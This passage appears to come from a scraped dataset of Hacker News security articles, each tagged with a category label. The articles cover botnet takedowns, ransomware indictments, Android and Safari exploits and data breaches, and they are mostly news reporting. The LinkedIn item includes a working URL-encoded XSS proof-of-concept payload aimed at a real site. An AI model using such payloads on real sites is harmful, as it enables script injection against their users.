their malware,"" Redscan researchers noted on Friday. ""This means there is a realistic possibility that Emotet's operators will use this opportunity to make the loader malware even more resilient, for example, by using polymorphic techniques to counter future coordinated action. They could also use the Emotet source code to branch off and create smaller, independent botnets."" The mass action marks the second time law enforcement agencies have intervened to remove malware from compromised machines. Earlier this month, the U.S. government took steps to remove web shell backdoors dropped by the Hafnium threat actor from Microsoft Exchange servers located in the country that were breached using ProxyLogon exploits. Following the court-authorized operation, the Federal Bureau of Investigation said it's in the process of notifying all the organizations from which it had removed web shells, implying the intelligence agency accessed the systems without their knowledge. ",Cyber_Attack Cross Site Scripting (XSS) Vulnerability in Google,https://thehackernews.com/2012/01/cross-site-scripting-xss-vulnerability.html,"Cross Site Scripting (XSS) Vulnerability in Google Ucha Gobejishvili Hacker with codename ""longrifle0x"" discovered another Cross Site Scripting (XSS) Vulnerability in Google's Website. He already reported about the Vulnerability to Google Security Experts. Proof of Concept: Open https://www.google.com/a/cpanel/premier/new3?hl=en and Click Find Domain . Put xss code: Another XSS Vulnerabilities Discovered by longrifle0x https://xssed.com/archive/author=longrifle0x/special=1/ ",Vulnerability These Are The FBI's Most Wanted Hackers — Total $4.2 Million Reward,https://thehackernews.com/2015/07/fbi-most-wanted-hackers.html,"The US State Department and the Federal Bureau of Investigation are willing to pay a total $4.2 Million for information leading to the arrest and/or conviction of top 5 most wanted cyber criminals accused of conducting frauds of hundreds of millions of dollars. Evgeniy Bogachev,30; Nicolae Popescu, 34; Alexsey Belan, 28; Peteris Sahurovs, 26; and Shailesh Kumar Jain, 45; are in the list of FBI's Top 5 most-wanted hackers. 1. Evgeniy Mikhailovich Bogachev | Reward - $3 MILLION Evgeniy Mikhailovich Bogachev, also known under the aliases ""lucky12345,"" ""Slavik,"" and ""Pollingsoon,"" is the mastermind behind the GameOver Zeus botnet, which was allegedly used by criminals to infect more than 1 Million computers, resulting in up to $100 Million in losses since 2009. Besides GameOver Zeus botnet, Bogachev is also accused of developing CryptoLocker Ransomware, which was designed to extort money from computer victims by holding their system's files hostage until the victim pays a ransom fee to get them back. Bogachev tops the FBI target's list with $3 Million in reward for anyone giving the information leading to his direct arrest and/or conviction. 2. Nicolae Popescu | Reward - $1 Million Nicolae Popescu, who also used the aliases Niculae Popescu, Nae Popescu, Nicolae Petrache, ""Nae"", and ""Stoichitoiu"", second topped the FBI's 5 Most-Wanted Cyber Criminals list. This 34-year-old Romanian is accused of fooling innocent Americans with fake auction posts on several websites, including eBay, Cars.com, and AutoTrader.com, claiming to sell cars that just didn't exist. Popescu and other criminal hackers affiliated with the scheme made more than $3 Million off the auctions, victimizing almost 800 users who handed over money for imaginary cars, Rolex watches, yachts, private airplanes, and other luxury goods. Authorities tracked down and arrested six members of the cyber gang in late 2012, but Popescu and a partner slipped away. 3. Alexsey Belan | Reward - $100,000 Alexsey Belan, a Russian national, is wanted for allegedly stealing consumer data by compromising the cyber security systems of three unnamed major US-based e-commerce sites in Nevada and California between 2012 and 2013. After stealing and exporting user databases with passwords to his server, Belan is accused of allegedly negotiating the sales of the databases. 4. Peteris Sahurovs | Reward - $50,000 Peteris Sahurovs is accused of developing and selling a computer virus through advertisements on news website pages. He allegedly carried out the scheme from February 2010 to September 2010. Under the malicious scheme, the fake ads displayed on the web pages forced users to purchase fraudulent antivirus software. In case, a user refuse to buy the software, the victim's desktop would be flooded with pop-ups and fake security alerts. Sahurovs, a native of Latvia, made more than $2 Million by selling his ""antivirus"" software. 5. Shailesh Kumar Jain | Reward - $50,000 Shailesh Kumar Jain is the only American citizen on the FBI's Most Wanted Hackers list. Jain made $100 Million between December 2006 and October 2008, according to the FBI. He used a flood of pop-up ads and email scamming to convince users that their computers were infected with a virus and then selling them the bogus AV software packages for between $30 and $70. ",Malware FBI Warns Conti Ransomware Hit 16 U.S. Health and Emergency Services,https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html,"The adversary behind Conti ransomware targeted no fewer than 16 healthcare and first responder networks in the U.S. within the past year, totally victimizing over 400 organizations worldwide, 290 of which are situated in the country. That's according to a new flash alert issued by the U.S. Federal Bureau of Investigation (FBI) on Thursday. ""The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year,"" the agency said. Ransomware attacks have worsened over the years, with recent targets as varied as state and local governments, hospitals, police departments, and critical infrastructure. Conti is one of many ransomware strains that have capitulated on that trend, commencing its operations in July 2020 as a private Ransomware-as-a-Service (RaaS), in addition to jumping on the double extortion bandwagon by launching a data leak site. Based on an analysis published by ransomware recovery firm Coveware last month, Conti was the second most prevalent strain deployed, accounting for 10.2% of all the ransomware attacks in the first quarter of 2021. Infections involving Conti have also breached the networks of Ireland's Health Service Executive (HSE) and Department of Health (DoH), prompting the National Cyber Security Centre (NCSC) to issue an alert of its own on May 16, stating that ""there are serious impacts to health operations and some non-emergency procedures are being postponed as hospitals implement their business continuity plans."" Conti operators are known for infiltrating enterprise networks and spreading laterally using Cobalt Strike beacons prior to exploiting compromised user credentials to deploy and execute the ransomware payloads, with the encrypted files renamed with a "".FEEDC"" extension. Weaponized malicious email links, attachments, or stolen Remote Desktop Protocol (RDP) credentials are some of the tactics the group used to gain an initial foothold on the target network, the FBI said. ""The actors are observed inside the victim network between four days and three weeks on average before deploying Conti ransomware,"" the agency noted, adding the ransom amounts are tailored to each victim, with recent demands ratcheting up to as high as $25 million. The alert also comes amid a proliferation of ransomware incidents in recent weeks, even as extortionists continue to seek exorbitant prices from companies in hopes of landing a huge, quick payday. Insurance major CNA Financial is said to have paid $40 million, while Colonial Pipeline and Brenntag have each shelled out nearly $4.5 million to regain access to their encrypted systems. ",Malware "Wiper, the Destructive Malware possibly connected to Stuxnet and Duqu",https://thehackernews.com/2012/09/wiper-destructive-malware-possibly.html,"Kaspersky Lab publishes research resulting from the digital forensic analysis of the hard disk images obtained from the machines attacked by the Wiper - a destructive malware program attacking computer systems related to oil facilities in Western Asia. Security researchers from Kaspersky Lab have uncovered information suggesting a possible link between the mysterious malware that attacked Iranian oil ministry computers in April and the Stuxnet and Duqu cyber espionage threats. The malware wipes data from hard drives, placing high priority on those with a .pnf extension, which are the type of files Stuxnet and Duqu used, and has other behavioral similarities, according to Schouwenberg. It also deletes all traces of itself. As a result, researchers have not been able to get a sample, but they've reviewed mirror images left on hard drives. Kaspersky's researchers were not able to find the mysterious malware, which was given the name Wiper, because very little data from the affected hard disk drives was recoverable. Even though a connection to Flame is unlikely, there is some evidence suggesting that Wiper might be related to Stuxnet or Duqu.For example, on a few of the hard drives analyzed, the researchers found traces of a service called RAHDAUD64 that loaded files named ~DFXX.tmp where XX are two random digits from the C:\WINDOWS\TEMP folder. No one has ever found a sample of Wiper in order to study its code and determine exactly what it did to machines in Iran. According to Kaspersky, the malware's algorithm is ""designed to quickly destroy as many files as effectively as possible, which can include multiple gigabytes at a time."" Although Flame can be updated by its creators with various modules, including conceivably a module that would destroy data, there has never been any evidence found that Flame had a module that was used to destroy data on machines or wipe out hard drives. ",Vulnerability Android 4.0.4 multiple Zero-Day Vulnerabilities,https://thehackernews.com/2012/09/android-404-multiple-zero-day.html,"The Samsung Galaxy S3 can be hacked via NFC, allowing attackers to download all data from the Android smartphone, security researchers demonstrated during the Mobile Pwn2Own contest in Amsterdam. Using a pair of zero day vulnerabilities, a team of security researchers from U.K.-based MWR Labs hacked into a Samsung Galaxy S3 phone running Android 4.0.4 by beaming an exploit via NFC (Near Field Communications). NFC is a technology that allows data to be sent over very short distances. For mobile devices, the protocol allows digital wallet applications to transfer money to pay at the register. While the technology has been slow to take off, despite the adoption by Google for its Wallet payment application, a number of recent high-profile announcements have boosted its adoption. ""Through NFC it was possible to upload a malicious file to the device, which allowed us to gain code execution on the device and subsequently get full control over the device using a second vulnerability for privilege escalation,"" MWR InfoSecurity said in a statement. ""The same vulnerability could also be exploited through other attack vectors, such as malicious websites or e-mail attachments."" The attacker, for instance, gets access to all SMS messages, pictures, emails, contact information and much more. The payload is very advanced, so attackers can ""basically do anything on that phone,"" the researchers said. How this Works: 1.) The first, a memory corruption flaw, was exploited via NFC (by holding two Galaxy S 3s next to each other) to upload a malicious file, which in turn allowed the team to gain code execution on the device. 2.) The malware then exploited a second vulnerability to gain full control over the device using privilege escalation. This undermined Android's app sandbox model, allowing the attackers to install their customised version of Mercury, the company's Android assessment framework. 3.) Mercury was then used to exfiltrate user data on the device (such as contacts, emails, text messages, and pictures) to a remote listener. Researchers also said that,""Crucially, the ASLR implementation is incomplete in Android 4.0.4, and does not cover Bionic (Android's linker) and /system/bin/app_process, which is responsible for starting applications on the device. Other protections which would make exploitation harder were also found to be absent."" MWR Labs, which won $30,000 for its hack, is planning a more technical blog post detailing the process of finding and exploiting this bug. Also, a Dutch research Joost Pol , CEO of Certified Secure, a nine-person research outfit based in The Hague hack into Apple's iPhone 4S from scratch, exploited a WebKit vulnerability to launch a drive-by download when the target device simply surfs to a booby-trapped web site. They used code auditing techniques to ferret out the WebKit bug and then spent most of the three weeks chaining multiple clever techniques to get a ""clean, working exploit."" During the Pwn2Own attack, Pol created a web site that included an amusing animation of the Certified Secure logo taking a bite of the Apple logo. The drive-by download attack did not crash the browser so the user was oblivious to the data being uploaded to the attacker's remote server. ""If this is an attack in the wild, they could embed the exploit into an ad on a big advertising network and cause some major damage."" The duo destroyed the exploit immediately after the Pwn2Own hack. ""We shredded it from our machine. The story ends here, we're not going to use this again. It's time to look for a new challenge,"" Pol said.He provided the vulnerability and proof-of-concept code that demonstrates the risk to contest organizers at HP TippingPoint Zero Day Initiative (ZDI). ",Vulnerability LinkedIn with Two-factor authentication and Cross Site Scripting Flaw,https://thehackernews.com/2013/06/linkedin-with-two-factor-authentication.html,"Two Factor Authentication is becoming a standard in the enterprise security space in an attempt to dually secure end users against malicious attacks. Following Dropbox, Google and virtually everyone else, LinkedIn added two-factor authentication to its login process today. LinkedIn will provide temporary codes for two-factor authentication through SMS messages. The extra step is designed to lessen the chances of computer hackers breaking into user accounts. To turn on two-step verification on LinkedIn, hit the icon in the top-right corner of the site, click on ""Privacy & Settings,"" and then on ""Manage security settings"" at the bottom. The site has provided instructions to its 225 million users on how to turn on the optional service. On other side, today @The_Pr0ph3t, whitehat Hacker from Spain reported a Cross Site Scripting Vulnerability in LinkedIn Developer site (developer.linkedin.com). Flaw still exists on website at the time of writing, and hacker also reported the flaw to LinkedIn developer team for patch. Proof of Concept: https://developer.linkedin.com/search/node/%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E ",Vulnerability Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs,https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html,"An unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an ""unusual"" campaign. The backdoor is distributed via a decoy document named ""Manifest.docx"" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. The malware-laced document claims to be a ""Manifesto of the inhabitants of Crimea"" calling on the citizens to oppose Russian President Vladimir Putin and ""create a unified platform called 'People's Resistance.'"" The Internet Explorer flaw, tracked as CVE-2021-26411, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to target security researchers working on vulnerability research and development. Earlier this February, South Korean cybersecurity firm ENKI revealed the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft addressed the issue as part of its Patch Tuesday updates for March. The Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines. ""While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,"" Malwarebytes researcher Hossein Jazi said in a report shared with The Hacker News. ""The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets."" Besides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server. Also discovered by Malwarebytes is a PHP-based panel nicknamed ""Ekipa"" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT. ""As the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well,"" Jazi said. ""The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag."" ",Malware Pakistan Government servers messed up after security breach,https://thehackernews.com/2013/03/pakistan-government-servers-messed-up.html,"Today a cyber attack on Pakistan Government servers crash many Government departments's official websites including Ministry of Information Technology, Ministry of Railways, Ministry of Economic Affairs & Statistics, Ministry of Interior, Ministry of Religious Affairs, Ministry of Science and Technology, Ministry of Environment and many more. Indian Hacker 'Godzilla' continue to strike Pakistan Government because of their support to terrorism activities. Hacker said,""all network owned including switches because they deserve it, I have not touched any innocent website because target is only Government"" While Pakistani official are already aware about the risk from the newest viruses, worms and cyber attacks, so they having their servers running through a proxy server located at https://202.83.164.6/ ,but flawed cyber security practices once again results to messed up whole setup and hacker successfully breach into centralized local server located at 192.168.70.103 b/w website hosting server & proxy server at machine. Hacker claimed to breach this centralized IBM server with Layer 2-3 Gigabit Ethernet Switch Module for IBM eServer, BladeCenter. This IBM server further connected to 22 local machines that were used to build the proxy server, that was securing the digital cyber space of Pakistan. ""They are running it through a local system 192.168.70.103 which is been shut down as we have access of the switch"" he said. After attack, shutdown of above server Websites under attack: www.moitt.gov.pk www.railways.gov.pk www.ead.gov.pk www.interior.gov.pk www.ipc.gov.pk www.mora.gov.pk www.establishment.gov.pk www.housing.gov.pk www.mosp.gov.pk www.planningcommission.gov.pk www.minorities.gov.pk www.lgrd.gov.pk www.moenv.gov.pk More than 24 hours, the Gateway of Pakistan website (https://www.pakistan.gov.pk/) was also down because of same security breach, but official managed to recover that server after removing routing that one via same targeted proxy server. Hacker also claimed to have access to File server of Pakistan Government. Network and server admins are working hardly to fix the issue generated after security breach, at the time of reporting this news,above listed all sites are down. ",Cyber_Attack Watering Hole Attack Was Used to Target Florida Water Utilities,https://thehackernews.com/2021/05/watering-hole-attack-was-used-to-target.html,"An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack. ""This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event,"" Dragos researcher Kent Backman said in a write-up published on Tuesday. The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said. Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system and infect it with malware. In this specific case, however, the infected website didn't deliver exploit code or attempt to achieve access to visitors' systems. Instead, the injected code functioned as a browser enumeration and fingerprinting script that harvested various details about the website's visitors, including operating system, CPU, browser (and plugins), input methods, presence of a camera, accelerometer, microphone, time zone, locations, video codecs, and screen dimensions. The collected information was then exfiltrated to a database hosted on a Heroku app site (bdatac.herokuapp[.]com) that also stored the script. The app has since been taken down. Dragos suspects a vulnerable WordPress plugin may have been exploited to insert the script into the website's code. No fewer than 1,000 end-user computers visited the infected site during the 58-day window beginning Dec. 20, 2020, before it was remediated on Feb. 16, 2021. ""Those who interacted with the malicious code included computers from municipal water utility customers, state and local government agencies, various water industry-related private companies, and normal internet bot and website crawler traffic,"" Backman said. ""Dragos' best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware's ability to impersonate legitimate web browser activity,"" the researcher added. Based on telemetry data gathered by the company, one among those 1,000 visits came from a computer residing in the network belonging to the City of Oldsmar on Feb. 5, the same day an unidentified adversary managed to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant. The attackers were ultimately foiled in their attempt by an operator, who managed to catch the manipulation in real-time and restored the concentration levels to undo the damage. The unauthorized access is said to have occurred via TeamViewer remote desktop software installed on one of the plant's several computers that were connected to the control system. The Oldsmar plant cyberattack, and more recently the Colonial Pipeline ransomware incident, have set off concerns about the potential for tampering with industrial control systems deployed in critical infrastructure, prompting the U.S. government to take steps to bolster defenses by protecting federal networks and improving information-sharing between the U.S. government and the private sector on cyber issues, among others. ""This is not a typical watering hole,"" Backman said. ""We have medium confidence it did not directly compromise any organization. But it does represent an exposure risk to the water industry and highlights the importance of controlling access to untrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS) environments."" ",Cyber_Attack Apple Safari Browser Vulnerable to URL Spoofing Vulnerability,https://thehackernews.com/2015/05/safari-url-spoofing.html,"A serious security vulnerability has been uncovered in Apple's Safari web browser that could trick Safari users into visiting a malicious website with the genuine web address. A group of researchers, known as Deusen, has demonstrated how the address spoofing vulnerability could be exploited by hackers to fool victim into thinking they are visiting a trusted website when actually the Safari browser is connected to an entirely different address. This flaw could let an attacker lead Safari users to a malicious site instead of a trusted website they willing to connect to install malicious software and steal their login credentials. The vulnerability was discovered by the same group who reported a Universal Cross Site Scripting (XSS) flaw in all the latest patched versions of Microsoft's Internet Explorer in February this year that put IE users' credentials and other sensitive information at risk. The group recently published a proof-of-concept exploit code that makes the Safari web browser to display the Daily Mail's website (dailymail.co.uk) although the browser is displaying the contents from deusen.co.uk. The POC works on fully patched versions of Apple's mobile operating system (iOS) as well as desktop operating system (OS X). What's even worse? The vulnerability could be exploited by hackers to launch highly credible phishing attacks or hijack users' accounts on any website. Instead of Daily Mail website, a hacker could use a bank website and then inject a rogue form asking the user for private financial information. Based on a quick analysis, the demo page appears to force Safari user to visit the daily mail URL, as you can see in the browser's user interface. The script quickly loads another URL before the page can be loaded. The script looks like the following: At this point, Apple has not confirmed that whether the vulnerability is actively exploited by the cyber criminals in the wild. However, Apple has yet to comment on the issue. ",Vulnerability Europol Takes Down RAMNIT Botnet that Infected 3.2 Million Computers,https://thehackernews.com/2015/02/europol-takes-down-ramnit-botnet-that.html,"It seems like the world has declared war against the Cyber Criminals. In a recent update, we reported that FBI is offering $3 Million in Reward for the arrest of GameOver Zeus botnet mastermind, and meanwhile British cyber-police has taken down widely-spread RAMNIT botnet. The National Crime Agency (NCA) in a joint operation with Europol's European Cybercrime Centre (EC3) and law enforcement agencies from Germany, Italy, the Netherlands, and the United Kingdom has taken down the Ramnit ""botnet"", which has infected over 3.2 million computers worldwide, including 33,000 in the UK. Alike GameOver Zeus, RAMNIT is also a 'botnet' - a network of zombie computers which operate under criminal control for malicious purposes like spreading viruses, sending out spam containing malicious links, and carrying out distributed denial of service attacks (DDoS) in order to bring down target websites. RAMNIT believes to spread malware via trustworthy links sent through phishing emails or social networking sites, and mainly target people running Windows operating systems in order to steal money from victims bank accounts. Moreover, public FTP servers have also been found distributing the malware. Once installed, the infected computer comes under the control of the botnet operators. The module inadvertently downloads a virus onto the victim's computer which could be used by operators to access personal or banking information, steal passwords and disable anti-virus protection. RAMNIT SHUT-DOWN IN AN OPERATION In a statement on Tuesday, Europol revealed that the successful take-down of Ramnit botnet involved the help of Microsoft, Symantec and AnubisNetworks. The groups shut down the botnet's command and control infrastructure and redirected traffic from a total of 300 domain addresses used by Ramnit criminal operators. ""This successful operation shows the importance of international law enforcement working together with private industry in the fight against the global threat of cybercrime,"" said Wil van Gemart, Europol's deputy director of operations. ""We will continue our efforts in taking down botnets and disrupting the core infrastructures used by criminals to conduct a variety of cybercrimes."" NASTY FEATURES OF RAMNIT BOTNET Symantec says that Ramnit has been around for over four years, first originating as a computer worm. According to the anti-virus firm, Ramnit is a ""fully-featured cybercrime tool, featuring six standard modules that provide attackers with multiple ways to compromise a victim."" The features are: SPY MODULE - This is one of the most powerful Ramnit features, as it monitors the victim's web browsing and detects when they visit online banking sites. It can also inject itself into the victim's browser and manipulate the bank's website in such a way that it appears legitimate and easily grab victim's credit card details. COOKIE GRABBER - This steals session cookies from web browsers and send them back to the Ramnit operators, who can then use the cookies to authenticate themselves on websites and impersonate the victim. This could allow an attacker to hijack online banking sessions. DRIVE SCANNER - This scans the computer's hard drive and steals files from it. The scanner is configured in such a way that it searches for specific folders which contain sensitive information such as victims' passwords. ANONYMOUS FTP SERVER - By connecting to this server, the malware lets attackers remotely access the infected computers and browse the file system. The server can be used to upload, download, or delete files and execute commands. VIRTUAL NETWORK COMPUTING (VNC) MODULE - This feature provides the attackers with another means to gain remote access to the compromised computers. FTP GRABBER - This feature allows the attackers to gather login credentials for a large number of FTP clients. WHY BOTNET RE-EMERGE AFTER TAKEDOWNS ? According to the authorities, Ramnit botnet has been taken down, but is it guaranteed that the botnet will not re-emerged again? We have seen the took down of GameOver Zeus botnet by FBI and Europol as well, but what happened at last? Just after a month, GameOver Zeus botnet again came into operation with more nasty features. So, What went wrong? Why Botnet take downs are ineffective? One reason could be that the organisations grab and take-down only a small fraction of command-and-control domains that build up the Botnet critical infrastructure, but leaves a majority of fraction active. This takes some months for a botnet operator to recover. As more and more botnet networks are taken down by Law Enforcement, cyber criminals are increasingly using secondary communication methods, such as peer-to-peer or domain generation algorithms (DGA). One of the main reasons that the Botnet re-emerged is because the author of the malware didn't get arrested. No matter how many domains are taken down or how many sinkholes researchers create, if the attackers are not arrested, nobody can stop them from building new Botnet from zero. On this we really appreciate the FBI step to reward $3 Million for the information leading to the direct arrest or conviction of Evgeniy Mikhailovich Bogachev, the alleged author of GameOver Zeus botnet that was used by cybercriminals to steal more than $100 Million from online bank accounts. ",Malware HackerProof : Your Guide To PC Security,https://thehackernews.com/2012/10/hackerproof-your-guide-to-pc-security.html,"With over 140,000 known computer viruses and 85,000,000 spam emails sent out each day, the likelihood of your PC coming into contact with malware such as viruses, worms, and spyware is almost guaranteed. It is very important to secure your computer just like you would secure your house or car. Your computer can be completely taken over without your permission or knowledge if it is vulnerable and connected to the Internet. Hackers constantly scan the Internet looking for vulnerable hosts, and a computer can be infected by a worm or virus within 15 minutes of connecting to the Internet if certain precautions are not taken. You can avoid most common infections by taking just a few steps, Here is an overview of PC security best practices and tips - ""HackerProof : Your Guide To PC Security"" This 53 page guide provides an objective, detailed, but easily understood walk through of PC security. By the end of this guide, you will know exactly what PC security means and, more importantly, what you need to do to keep your PC secure. Book includes: The history and types of modern malware Which operating system is most secure Good security habits that keep you safe Software that can protect you The importance of backing up your data Recovering from a malware attack Download ""HackerProof"" Guide Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter. ",Malware miniFlame - A New cyber espionage malware discovered,https://thehackernews.com/2012/10/miniflame-new-cyber-espionage-malware.html,"Kaspersky has discovered new malware dubbed 'miniFlame', cyber espionage software directly linked to Flame. This new nation-state espionage malware that has ties to two previous espionage tools known as Flame and Gauss, and that appears to be a ""high-precision, surgical attack tool"" targeting victims in Lebanon, Iran and elsewhere. miniFlame, also known as SPE, was found by Kaspersky Lab's experts in July 2012, and was originally identified as a Flame module. But originally MiniFlame seems to be used to gain control of and obtain increased spying capability over select computers originally infected by the Flame and Gauss spyware. According to Kaspersky, versions of miniFlame were created in 2010 and 2011, and some of the six variants are still considered active. It is expected that development of the malicious program could have started as far back as 2007. ""MiniFlame is a high precision attack tool,"" said Alexander Gostev, Chief Security Expert, Kaspersky Lab, describing the malware. ""Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyberattack."" Main results of miniFlame analyses: miniFlame aka SPE, based on the same architectural platform as Flame. It can run as a standalone program or cyber espionage as an internal component of Flame and Gauss. The tool of cyber operates via a backdoor (""backdoor"") designed to steal data and give direct access to infected systems. Development miniFlame could have started as early as 2007 and continued until the end of 2011. Many variants appear to have been created. Today, Kaspersky Lab has identified six key corresponding to two generations 4.x and 5.x. Unlike Flame or Gauss, responsible for a large number of infections, due to the miniFlame is much lower. According to the data from Kaspersky Lab, it would be limited to 10 or 20 machines. The total number of infections globally is estimated at 50 or 60. The small number of infections combined with flight capabilities miniFlame information and the flexibility of its design indicates that it has been used for highly targeted cyber espionage operations and has most likely been deployed in machines already infected with Flame or Gauss. Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter. ",Cyber_Attack U.S Charges Two Iranian Hackers for SamSam Ransomware Attacks,https://thehackernews.com/2018/11/samsam-ransomware-iranian-hackers.html,"The Department of Justice announced Wednesday charges against two Iranian nationals for their involvement in creating and deploying the notorious SamSam ransomware. The alleged hackers, Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah, 27, have been charged on several counts of computer hacking and fraud charges, the indictment unsealed today at New Jersey court revealed. The duo used SamSam ransomware to extort over $6 million in ransom payments since 2015, and also caused more than $30 million in damages to over 200 victims, including hospitals, municipalities, and public institutions. According to the indictment, Savandi and Mansouri have been charged with a total of six counts, including one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two counts of intentional damage to a protected computer, and two counts of transmitting a demand in relation to damaging a protected computer. Since both hackers live in and operated from Iran, they have not yet been arrested by the United States authorities and the FBI has added them on their list of wanted hackers. According to the indictment, Savandi and Mansouri created the first version of the SamSam Ransomware in December 2015 and created further refined versions of the threat in June and October 2017. ""Defendants authored various versions of the SamSam Ransomware, which was designed to encrypt data on Victim computers. SamSam Ransomware was designed to maximize the damage caused to the Victim by, for instance, also encrypting backups of the targeted computers,"" the indictment says. ""Defendants used a variety of methods to gain access to Victim computer networks, including exploiting known security vulnerabilities in common server software and utilizing virtual private servers such as European VPS #1 and European VPS #2 to mask their identities."" Unlike most ransomware infections, SamSam was not distributed in an unplanned way via spam email campaigns. Instead, the attackers chose potential targets and infected systems manually. Attackers first compromised the RDP on a targeted system—either by conducting brute force attacks or using stolen credentials—and then attempted to strategically deploy SamSam throughout the network by exploiting vulnerabilities in other systems. Once on the entire network, SamSam encrypts the system's data and demands a huge ransom payment (usually more than $50,000 which is much higher than normal) in Bitcoin in exchange for the decryption keys. Since December 2015, SamSam has significantly targeted some large organizations, including the Atlanta city government, the Colorado Department of Transportation, several hospitals and educational institutions like the Mississippi Valley State University. ""According to the indictment, [affected victims includes] the City of Atlanta, the City of Newark, the Port of San Diego, the Colorado Department of Transportation, the University of Calgary, Hollywood Presbyterian Medical Centers, Kansas Heart Hospital, MedStar Health, Nebraska Orthopedic Hospital, and Allscripts Healthcare Solutions Inc."" The Atlanta city's officials refused to pay the ransomware, and the recovery effort cost them estimated $17 million. Leaving behind other well-known ransomware viruses like WannaCry and NotPetya, SamSam became the largest paid ransomware of its kind with one individual victim paid $64,000. Since Iran has no extradition policy with the United States, the indictment may not guarantee the extraditions or convictions of the two alleged hackers. But being on the wanted list of the FBI make it difficult for the duo to travel outside their country's boundary freely. ",Malware TapLogger Android Trojan can Determine Tapped Keys,https://thehackernews.com/2012/04/taplogger-android-trojan-can-determine.html,"TapLogger Android Trojan cab Determine Tapped Keys Today's smartphones are shipp ed with various embedded motion sensors, such as the accelerometer, gyroscope, and orientation sensors. These motion sensors are useful in supporting the mobile UI innovation and motion-based commands. However, they also bring potential risks of leaking user's private information as they allow third party applications to monitor the motion changes of smart phones. A team of researchers from Pennsylvania State University (PSU) and IBM have devised an Android-based Trojan that can use a handset's onboard movement sensors to crack passwords. The team created an experimental app called TapLogger, which is based on the premise that when you tap on your touch screen, you're not just interacting with the screen, but moving the entire device. So if you hit a button in the upper right corner, your phone will actually move in that direction slightly, and that subtle movement is then read by the accelerometer and other sensors built-in to your device. TapLogger was created by Zhi Xu, a PhD candidate in the Department of Computer Science and Engineering at PSU, Kun Bai, a researcher at IBM T.J. Watson Research Center and Sencun Zhu, an associate professor of Computer Science and Engineering at PSU's College of Engineering. Accelerometer and orientation sensor data are not protected under Android's security model, and this means that they are exposed to any application, regardless of its permissions on the system, the research team said in a paper that was presented during the ACM Conference on Security and Privacy in Wireless and Mobile Networks on Tuesday. In August 2011, a pair of researchers from University of California proposed a similar attack and designed a concept application called TouchLogger to demonstrate it. ",Malware Android Malware can now steal 3D Model Of Your Location,https://thehackernews.com/2012/10/android-malware-can-now-steal-3d-model.html,"It's a fact that as smartphones get more capable, the possibilities for their misuse also increase. They're already exploited by crooks to swipe personal information, but a new Android app created by the U.S. Navy is on another level entirely. It's a scary piece of malware called ""PlaceRaider"" that was developed by the US Naval Surface Warfare center and for now it is being viewed as just a proof of concept. According to the MIT Technology Review, researchers at Indiana University and the Naval Surface Warfare Center have developed a new form of malware designed to record and reconstruct a victim's environment. They has just worked out how to infect a mobile phone with a Trojan that can take photos without you knowing anything about it and send sensor data back to a server. The data are used to construct a 3D model which can be used not only to perform the reconnaissance necessary to break in, but also to steal confidential information such as bank details. On the original page presenting an explanation of the app, the authors note that their work demonstrated ""the effectiveness of using mobile devices as powerful surveillance and virtual theft platforms."" The software even shuts off the phone's speaker so someone being spied on doesn't hear the typical sound a device emits when a photo is taken. The developers do say that one way to protect yourself against virtual theft apps such as this is by ensuring that you always have antivirus software and that your shutter audio is always on. ",Malware 50 million customers compromised in LivingSocial hack,https://thehackernews.com/2013/04/50-million-customers-compromised-in.html,"LivingSocial, a daily deals website part-owned by Amazon Inc., hit by a cyber attack that may have affected more than 50 million customers and will need to reset their passwords. LivingSocial says it has 70 million members worldwide. Leaked data includes names, e-mail addresses, dates of birth and encrypted passwords. Customers' credit 